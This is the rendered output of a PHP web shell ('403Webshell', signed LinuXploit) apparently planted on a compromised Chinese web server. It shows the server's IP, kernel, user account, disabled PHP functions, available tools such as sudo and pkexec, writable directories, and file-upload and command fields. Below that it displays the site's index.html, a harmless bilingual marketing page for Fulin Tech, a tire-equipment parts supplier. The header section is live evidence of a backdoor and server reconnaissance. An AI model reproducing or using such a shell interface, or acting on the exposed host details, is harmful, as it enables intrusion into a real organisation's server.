403Webshell
Server IP : 156.238.232.47  /  Your IP : 216.73.216.150
Web Server : nginx/1.25.3
System : Linux C202504152095410 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : www ( 1000)
PHP Version : 8.3.25
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/data/wwwroot/2026_03_06_01/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/data/wwwroot/2026_03_06_01/index.html
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>芙琳科技 Fulin Tech | 轮胎制造设备供应链专家</title>
    <meta name="description" content="芙琳科技成立于2013年,为轮胎成型机与硫化机提供60%+关键零部件,一站式供应链服务助力降本增效。">
    <script src="https://cdn.tailwindcss.com"></script>
    <script src="https://unpkg.com/lucide@latest"></script>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&family=Noto+Sans+SC:wght@300;400;500;700&display=swap" rel="stylesheet">
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    colors: {
                        primary: '#1E3A8A',
                        secondary: '#DC2626',
                        accent: '#F59E0B',
                        dark: '#0F172A',
                    }
                }
            }
        }
    </script>
    <style>
        .hero-slide { position: absolute; inset: 0; opacity: 0; transition: opacity 1s ease-in-out; }
        .hero-slide.active { opacity: 1; }
        .lang-btn.active { background-color: #1E3A8A; color: white; }
        .machine-card { background: linear-gradient(145deg, #1E293B 0%, #0F172A 100%); border: 1px solid #334155; }
        .industrial-pattern {
            background-image: 
                linear-gradient(45deg, rgba(255,255,255,0.03) 25%, transparent 25%),
                linear-gradient(-45deg, rgba(255,255,255,0.03) 25%, transparent 25%),
                linear-gradient(45deg, transparent 75%, rgba(255,255,255,0.03) 75%),
                linear-gradient(-45deg, transparent 75%, rgba(255,255,255,0.03) 75%);
            background-size: 20px 20px;
            background-position: 0 0, 0 10px, 10px -10px, -10px 0px;
        }
    </style>
</head>
<body class="font-sans antialiased text-gray-800 bg-gray-50">
    <!-- Top Bar -->
    <div class="bg-gray-900 text-white text-sm py-2">
        <div class="max-w-7xl mx-auto px-4 flex justify-between items-center">
            <div class="flex items-center gap-4">
                <span class="flex items-center gap-1"><i data-lucide="phone" class="w-4 h-4"></i> +86 13671692232</span>
                <span class="flex items-center gap-1"><i data-lucide="mail" class="w-4 h-4"></i> sales@fulin-tech.com.cn</span>
            </div>
            <div class="flex gap-2">
                <button onclick="switchLang('zh')" id="btn-zh" class="lang-btn active px-3 py-1 rounded text-xs">中文</button>
                <button onclick="switchLang('en')" id="btn-en" class="lang-btn px-3 py-1 rounded text-xs hover:bg-gray-700">English</button>
            </div>
        </div>
    </div>

    <!-- Navigation -->
    <nav class="sticky top-0 z-50 bg-white shadow-lg">
        <div class="max-w-7xl mx-auto px-4 flex justify-between items-center h-20">
            <a href="index.html" class="flex items-center gap-3">
                <div class="w-12 h-12 bg-gray-900 rounded-full flex items-center justify-center">
                    <svg viewBox="0 0 100 100" class="w-8 h-8">
                        <circle cx="50" cy="50" r="45" fill="none" stroke="white" stroke-width="8"/>
                        <circle cx="50" cy="50" r="25" fill="none" stroke="white" stroke-width="6"/>
                        <path d="M50 5 L50 20 M50 80 L50 95 M5 50 L20 50 M80 50 L95 50" stroke="white" stroke-width="6"/>
                        <circle cx="72" cy="28" r="4" fill="#DC2626"/>
                    </svg>
                </div>
                <div>
                    <span class="text-2xl font-bold text-gray-900">Fulin</span>
                    <span class="text-xs text-gray-500 block" data-i18n="subtitle">芙琳科技</span>
                </div>
            </a>
            <div class="hidden lg:flex items-center gap-8">
                <a href="index.html" class="text-blue-900 font-bold" data-i18n="nav_home">首页</a>
                <a href="about.html" class="text-gray-700 hover:text-blue-900" data-i18n="nav_about">关于我们</a>
                <a href="products.html" class="text-gray-700 hover:text-blue-900" data-i18n="nav_products">产品中心</a>
                <a href="#contact" class="px-6 py-2.5 bg-blue-900 text-white rounded-lg font-bold hover:bg-blue-800" data-i18n="nav_contact">联系我们</a>
            </div>
        </div>
    </nav>

    <!-- Hero Section with Industrial Background -->
    <section class="relative h-[600px] overflow-hidden bg-gray-900 industrial-pattern">
        <div class="absolute inset-0 bg-gradient-to-r from-gray-900 via-gray-900/95 to-gray-900/80"></div>
        <div class="relative z-10 h-full flex items-center">
            <div class="max-w-7xl mx-auto px-4 w-full">
                <div class="max-w-2xl">
                    <div class="inline-flex items-center gap-2 px-4 py-2 bg-red-600/20 border border-red-600/30 rounded-full text-red-500 text-sm font-bold mb-6">
                        <span class="w-2 h-2 bg-red-600 rounded-full animate-pulse"></span>
                        <span data-i18n="hero_badge">始于2013 · 专注轮胎设备供应链</span>
                    </div>
                    <h1 class="text-5xl font-bold text-white mb-6 leading-tight" data-i18n="hero_title">
                        轮胎制造设备<br><span class="text-amber-500">一站式供应链</span>专家
                    </h1>
                    <p class="text-xl text-gray-300 mb-8" data-i18n="hero_desc">
                        为轮胎成型机与硫化机提供60%+关键零部件覆盖,涵盖机械、电气、流体、控制、检测五大系统
                    </p>
                    <div class="flex gap-4">
                        <a href="products.html" class="px-8 py-4 bg-blue-900 text-white rounded-lg font-bold hover:bg-blue-800 transition-all flex items-center gap-2">
                            <span data-i18n="hero_btn1">浏览产品</span><i data-lucide="arrow-right" class="w-5 h-5"></i>
                        </a>
                        <a href="#contact" class="px-8 py-4 bg-white/10 border-2 border-white/30 text-white rounded-lg font-bold hover:bg-white/20 transition-all" data-i18n="hero_btn2">获取报价</a>
                    </div>
                </div>
            </div>
        </div>
        <!-- Decorative Industrial Elements -->
        <div class="absolute right-0 top-1/2 transform -translate-y-1/2 w-96 h-96 opacity-10 hidden lg:block">
            <svg viewBox="0 0 200 200" class="w-full h-full">
                <circle cx="100" cy="100" r="90" fill="none" stroke="white" stroke-width="2"/>
                <circle cx="100" cy="100" r="70" fill="none" stroke="white" stroke-width="2"/>
                <circle cx="100" cy="100" r="50" fill="none" stroke="white" stroke-width="2"/>
                <line x1="100" y1="10" x2="100" y2="190" stroke="white" stroke-width="1"/>
                <line x1="10" y1="100" x2="190" y2="100" stroke="white" stroke-width="1"/>
            </svg>
        </div>
    </section>

    <!-- Stats -->
    <section class="bg-gray-900 py-12 border-y border-gray-800">
        <div class="max-w-7xl mx-auto px-4 grid grid-cols-2 md:grid-cols-4 gap-8 text-center">
            <div><div class="text-4xl font-bold text-amber-500 mb-2">11+</div><div class="text-gray-400 text-sm" data-i18n="stat_years">年行业深耕</div></div>
            <div><div class="text-4xl font-bold text-amber-500 mb-2">60%+</div><div class="text-gray-400 text-sm" data-i18n="stat_coverage">关键零部件覆盖</div></div>
            <div><div class="text-4xl font-bold text-amber-500 mb-2">200+</div><div class="text-gray-400 text-sm" data-i18n="stat_clients">全球服务客户</div></div>
            <div><div class="text-4xl font-bold text-amber-500 mb-2">40+</div><div class="text-gray-400 text-sm" data-i18n="stat_products">核心产品SKU</div></div>
        </div>
    </section>

    <!-- Equipment Categories -->
    <section class="py-20 bg-white">
        <div class="max-w-7xl mx-auto px-4">
            <div class="text-center mb-16">
                <h2 class="text-3xl font-bold text-gray-900 mb-4" data-i18n="equip_title">设备供应链服务</h2>
                <p class="text-gray-600" data-i18n="equip_desc">覆盖轮胎制造核心设备的完整供应链</p>
            </div>
            <div class="grid md:grid-cols-2 gap-8">
                <a href="products.html" class="machine-card rounded-2xl overflow-hidden block hover:shadow-2xl transition-shadow">
                    <div class="h-64 relative overflow-hidden">
                        <img src="images/home-tbm-card.png" alt="轮胎成型机" class="w-full h-full object-cover">
                        <div class="absolute inset-0 bg-gradient-to-br from-blue-900/50 to-transparent"></div>
                        <div class="absolute top-4 right-4 bg-blue-900 text-white px-3 py-1 rounded-full text-xs font-bold">60%+ Coverage</div>
                    </div>
                    <div class="p-8">
                        <h3 class="text-2xl font-bold text-white mb-3" data-i18n="tbm_title">轮胎成型机供应链</h3>
                        <p class="text-gray-400 mb-4" data-i18n="tbm_desc">提供成型机核心工艺关键部件,包括物料供给系统、压合装置、伺服控制系统、检测系统等全方位配套。</p>
                        <span class="text-blue-400 font-bold flex items-center gap-2"><span data-i18n="view_products">查看22个零部件</span><i data-lucide="chevron-right" class="w-4 h-4"></i></span>
                    </div>
                </a>
                <a href="products.html" class="machine-card rounded-2xl overflow-hidden block hover:shadow-2xl transition-shadow">
                    <div class="h-64 relative overflow-hidden">
                        <img src="images/home-tcp-card.jpg" alt="轮胎硫化机" class="w-full h-full object-cover">
                        <div class="absolute inset-0 bg-gradient-to-br from-red-900/50 to-transparent"></div>
                        <div class="absolute top-4 right-4 bg-red-600 text-white px-3 py-1 rounded-full text-xs font-bold">Complete Solution</div>
                    </div>
                    <div class="p-8">
                        <h3 class="text-2xl font-bold text-white mb-3" data-i18n="tcp_title">轮胎硫化机供应链</h3>
                        <p class="text-gray-400 mb-4" data-i18n="tcp_desc">提供硫化工艺温度、压力、时间控制的核心组件,包括液压系统、温控模块、电气柜等关键配套。</p>
                        <span class="text-red-400 font-bold flex items-center gap-2"><span data-i18n="view_products">查看18个零部件</span><i data-lucide="chevron-right" class="w-4 h-4"></i></span>
                    </div>
                </a>
            </div>
        </div>
    </section>

    <!-- Five Systems -->
    <section class="py-20 bg-gray-50">
        <div class="max-w-7xl mx-auto px-4 text-center">
            <h2 class="text-3xl font-bold text-gray-900 mb-4" data-i18n="systems_title">五大系统全覆盖</h2>
            <p class="text-gray-600 mb-12" data-i18n="systems_desc">一站式供应轮胎设备关键零部件</p>
            <div class="grid md:grid-cols-5 gap-6">
                <div class="bg-white rounded-xl p-6 shadow-lg hover:shadow-xl transition-shadow">
                    <div class="w-16 h-16 bg-blue-100 rounded-full flex items-center justify-center mx-auto mb-4"><i data-lucide="cog" class="w-8 h-8 text-blue-900"></i></div>
                    <h4 class="font-bold text-gray-900 mb-1" data-i18n="sys_mechanical">机械系统</h4>
                    <p class="text-xs text-gray-500">16 SKU</p>
                </div>
                <div class="bg-white rounded-xl p-6 shadow-lg hover:shadow-xl transition-shadow">
                    <div class="w-16 h-16 bg-red-100 rounded-full flex items-center justify-center mx-auto mb-4"><i data-lucide="zap" class="w-8 h-8 text-red-600"></i></div>
                    <h4 class="font-bold text-gray-900 mb-1" data-i18n="sys_electrical">电气系统</h4>
                    <p class="text-xs text-gray-500">10 SKU</p>
                </div>
                <div class="bg-white rounded-xl p-6 shadow-lg hover:shadow-xl transition-shadow">
                    <div class="w-16 h-16 bg-amber-100 rounded-full flex items-center justify-center mx-auto mb-4"><i data-lucide="droplets" class="w-8 h-8 text-amber-600"></i></div>
                    <h4 class="font-bold text-gray-900 mb-1" data-i18n="sys_fluid">流体系统</h4>
                    <p class="text-xs text-gray-500">6 SKU</p>
                </div>
                <div class="bg-white rounded-xl p-6 shadow-lg hover:shadow-xl transition-shadow">
                    <div class="w-16 h-16 bg-purple-100 rounded-full flex items-center justify-center mx-auto mb-4"><i data-lucide="cpu" class="w-8 h-8 text-purple-600"></i></div>
                    <h4 class="font-bold text-gray-900 mb-1" data-i18n="sys_control">控制系统</h4>
                    <p class="text-xs text-gray-500">5 SKU</p>
                </div>
                <div class="bg-white rounded-xl p-6 shadow-lg hover:shadow-xl transition-shadow">
                    <div class="w-16 h-16 bg-green-100 rounded-full flex items-center justify-center mx-auto mb-4"><i data-lucide="scan-line" class="w-8 h-8 text-green-600"></i></div>
                    <h4 class="font-bold text-gray-900 mb-1" data-i18n="sys_inspection">检测系统</h4>
                    <p class="text-xs text-gray-500">3 SKU</p>
                </div>
            </div>
        </div>
    </section>

    <!-- About Preview with Image Placeholder -->
    <section class="py-20 bg-white">
        <div class="max-w-7xl mx-auto px-4">
            <div class="grid lg:grid-cols-2 gap-16 items-center">
                <div>
                    <div class="inline-block px-4 py-1.5 bg-blue-100 text-blue-900 rounded-full text-sm font-bold mb-6" data-i18n="about_badge">关于芙琳</div>
                    <h2 class="text-3xl font-bold text-gray-900 mb-6" data-i18n="about_title">专注轮胎设备供应链服务</h2>
                    <p class="text-gray-600 mb-6 leading-relaxed" data-i18n="about_p1">芙琳科技(Fulin-Tech)成立于2013年,总部位于上海,是一家专注于轮胎制造设备供应链服务的高新技术企业。</p>
                    <p class="text-gray-600 mb-8 leading-relaxed" data-i18n="about_p2">凭借对轮胎成型机与硫化机设备的深度理解,我们能够提供超过60%的关键零部件,涵盖机械、电气、流体、控制、检测五大系统。</p>
                    <a href="about.html" class="inline-flex items-center gap-2 text-blue-900 font-bold hover:underline"><span data-i18n="learn_more">了解更多</span><i data-lucide="arrow-right" class="w-4 h-4"></i></a>
                </div>
                <!-- Team Photo -->
                <div class="relative rounded-2xl aspect-video overflow-hidden shadow-xl">
                    <img src="images/team.jpg" alt="芙琳科技工程团队" class="w-full h-full object-cover">
                    <div class="absolute inset-0 bg-gradient-to-t from-black/40 to-transparent"></div>
                    <div class="absolute bottom-0 left-0 right-0 p-6 text-white">
                        <p class="font-bold text-lg">专业技术团队</p>
                        <p class="text-sm text-white/80">为您提供可靠的供应链解决方案</p>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- Contact -->
    <section id="contact" class="py-20 bg-gray-900">
        <div class="max-w-7xl mx-auto px-4 grid lg:grid-cols-2 gap-16">
            <div>
                <h2 class="text-3xl font-bold text-white mb-6" data-i18n="contact_title">联系我们</h2>
                <p class="text-gray-400 mb-8" data-i18n="contact_desc">获取专业轮胎设备供应链解决方案</p>
                <div class="space-y-6">
                    <div class="flex items-start gap-4">
                        <div class="w-12 h-12 bg-blue-900/20 rounded-lg flex items-center justify-center"><i data-lucide="map-pin" class="w-6 h-6 text-blue-500"></i></div>
                        <div><div class="text-white font-bold mb-1" data-i18n="addr_title">公司地址</div><div class="text-gray-400">上海市闵行区剑川路930号A栋1楼</div></div>
                    </div>
                    <div class="flex items-start gap-4">
                        <div class="w-12 h-12 bg-red-600/20 rounded-lg flex items-center justify-center"><i data-lucide="phone" class="w-6 h-6 text-red-500"></i></div>
                        <div><div class="text-white font-bold mb-1" data-i18n="tel_title">联系电话</div><div class="text-gray-400">+86 13671692232</div></div>
                    </div>
                    <div class="flex items-start gap-4">
                        <div class="w-12 h-12 bg-amber-500/20 rounded-lg flex items-center justify-center"><i data-lucide="mail" class="w-6 h-6 text-amber-500"></i></div>
                        <div><div class="text-white font-bold mb-1" data-i18n="email_title">电子邮箱</div><div class="text-gray-400">sales@fulin-tech.com.cn</div></div>
                    </div>
                </div>
            </div>
            <div class="bg-gray-800 rounded-2xl p-8 border border-gray-700">
                <form id="inquiryForm" class="space-y-4">
                    <div class="grid md:grid-cols-2 gap-4">
                        <input type="text" id="inqName" placeholder="姓名 / Name" class="w-full px-4 py-3 bg-gray-900 border border-gray-600 rounded-lg text-white focus:border-blue-500 focus:outline-none">
                        <input type="text" id="inqCompany" placeholder="公司 / Company" class="w-full px-4 py-3 bg-gray-900 border border-gray-600 rounded-lg text-white focus:border-blue-500 focus:outline-none">
                    </div>
                    <input type="email" id="inqEmail" placeholder="邮箱 / Email" class="w-full px-4 py-3 bg-gray-900 border border-gray-600 rounded-lg text-white focus:border-blue-500 focus:outline-none">
                    <select id="inqProduct" class="w-full px-4 py-3 bg-gray-900 border border-gray-600 rounded-lg text-white focus:border-blue-500 focus:outline-none">
                        <option value="">请选择产品 / Select Product</option>
                        <option value="轮胎成型机零部件 / TBM Parts">轮胎成型机零部件 / TBM Parts</option>
                        <option value="轮胎硫化机零部件 / TCP Parts">轮胎硫化机零部件 / TCP Parts</option>
                    </select>
                    <textarea id="inqMessage" placeholder="留言 / Message" rows="4" class="w-full px-4 py-3 bg-gray-900 border border-gray-600 rounded-lg text-white focus:border-blue-500 focus:outline-none resize-none"></textarea>
                    <button type="button" onclick="submitInquiry()" class="w-full py-4 bg-blue-900 text-white rounded-lg font-bold hover:bg-blue-800 transition-all">提交询盘 / Submit Inquiry</button>
                </form>
                <script>
                    function submitInquiry() {
                        var name = document.getElementById('inqName').value;
                        var company = document.getElementById('inqCompany').value;
                        var email = document.getElementById('inqEmail').value;
                        var product = document.getElementById('inqProduct').value;
                        var message = document.getElementById('inqMessage').value;
                        
                        var subject = '【网站询盘】' + (product || '产品咨询') + ' - ' + (name || '未填写姓名');
                        var body = '姓名:' + (name || '未填写') + '\n' +
                                   '公司:' + (company || '未填写') + '\n' +
                                   '邮箱:' + (email || '未填写') + '\n' +
                                   '产品:' + (product || '未选择') + '\n\n' +
                                   '留言:\n' + (message || '无');
                        
                        window.location.href = 'mailto:sales@fulin-tech.com.cn?subject=' + encodeURIComponent(subject) + '&body=' + encodeURIComponent(body);
                    }
                </script>
            </div>
        </div>
    </section>

    <!-- Footer -->
    <footer class="bg-gray-800 border-t border-gray-700 py-8">
        <div class="max-w-7xl mx-auto px-4 text-center">
            <p class="text-gray-400 text-sm">© 2013-2024 Fulin Technology Co., Ltd. 芙琳科技信息有限公司 | 沪ICP备XXXXXXXX号</p>
        </div>
    </footer>

    <script>
        const translations = {
            zh: {
                subtitle: '芙琳科技', nav_home: '首页', nav_about: '关于我们', nav_products: '产品中心', nav_contact: '联系我们',
                hero_badge: '始于2013 · 专注轮胎设备供应链',
                hero_title: '轮胎制造设备<br><span class="text-amber-500">一站式供应链</span>专家',
                hero_desc: '为轮胎成型机与硫化机提供60%+关键零部件覆盖,涵盖机械、电气、流体、控制、检测五大系统',
                hero_btn1: '浏览产品', hero_btn2: '获取报价',
                stat_years: '年行业深耕', stat_coverage: '关键零部件覆盖', stat_clients: '全球服务客户', stat_products: '核心产品SKU',
                equip_title: '设备供应链服务', equip_desc: '覆盖轮胎制造核心设备的完整供应链',
                tbm_title: '轮胎成型机供应链', tbm_desc: '提供成型机核心工艺关键部件,包括物料供给系统、压合装置、伺服控制系统、检测系统等全方位配套。',
                tcp_title: '轮胎硫化机供应链', tcp_desc: '提供硫化工艺温度、压力、时间控制的核心组件,包括液压系统、温控模块、电气柜等关键配套。',
                view_products: '查看零部件',
                systems_title: '五大系统全覆盖', systems_desc: '一站式供应轮胎设备关键零部件',
                sys_mechanical: '机械系统', sys_electrical: '电气系统', sys_fluid: '流体系统', sys_control: '控制系统', sys_inspection: '检测系统',
                about_badge: '关于芙琳', about_title: '专注轮胎设备供应链服务',
                about_p1: '芙琳科技(Fulin-Tech)成立于2013年,总部位于上海,是一家专注于轮胎制造设备供应链服务的高新技术企业。',
                about_p2: '凭借对轮胎成型机与硫化机设备的深度理解,我们能够提供超过60%的关键零部件,涵盖机械、电气、流体、控制、检测五大系统。',
                learn_more: '了解更多',
                contact_title: '联系我们', contact_desc: '获取专业轮胎设备供应链解决方案',
                addr_title: '公司地址', tel_title: '联系电话', email_title: '电子邮箱'
            },
            en: {
                subtitle: 'Fulin Tech', nav_home: 'Home', nav_about: 'About', nav_products: 'Products', nav_contact: 'Contact',
                hero_badge: 'Since 2013 · Tire Equipment Supply Chain',
                hero_title: 'Tire Manufacturing<br><span class="text-amber-500">One-Stop Supply Chain</span> Expert',
                hero_desc: 'Providing 60%+ critical components for tire building machines and curing presses, covering 5 major systems.',
                hero_btn1: 'Browse Products', hero_btn2: 'Get Quote',
                stat_years: 'Years Experience', stat_coverage: 'Component Coverage', stat_clients: 'Global Clients', stat_products: 'Core SKUs',
                equip_title: 'Equipment Supply Chain', equip_desc: 'Complete supply chain for tire manufacturing equipment',
                tbm_title: 'Tire Building Machine', tbm_desc: 'Key components including feeding, compression, servo control, and inspection systems.',
                tcp_title: 'Tire Curing Press', tcp_desc: 'Critical components for temperature, pressure, and time control.',
                view_products: 'View Components',
                systems_title: 'Five Systems Coverage', systems_desc: 'One-stop supply of tire equipment components',
                sys_mechanical: 'Mechanical', sys_electrical: 'Electrical', sys_fluid: 'Fluid', sys_control: 'Control', sys_inspection: 'Inspection',
                about_badge: 'About Fulin', about_title: 'Focused on Tire Equipment Supply Chain',
                about_p1: 'Founded in 2013 and headquartered in Shanghai, Fulin-Tech specializes in supply chain services for tire manufacturing equipment.',
                about_p2: 'We provide over 60% of critical components for tire building machines and curing presses.',
                learn_more: 'Learn More',
                contact_title: 'Contact Us', contact_desc: 'Get professional tire equipment supply chain solutions',
                addr_title: 'Address', tel_title: 'Phone', email_title: 'Email'
            }
        };

        function switchLang(lang) {
            document.getElementById('btn-zh').classList.toggle('active', lang === 'zh');
            document.getElementById('btn-en').classList.toggle('active', lang === 'en');
            document.querySelectorAll('[data-i18n]').forEach(el => {
                const key = el.getAttribute('data-i18n');
                if (translations[lang][key]) el.innerHTML = translations[lang][key];
            });
        }

        lucide.createIcons();
    </script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit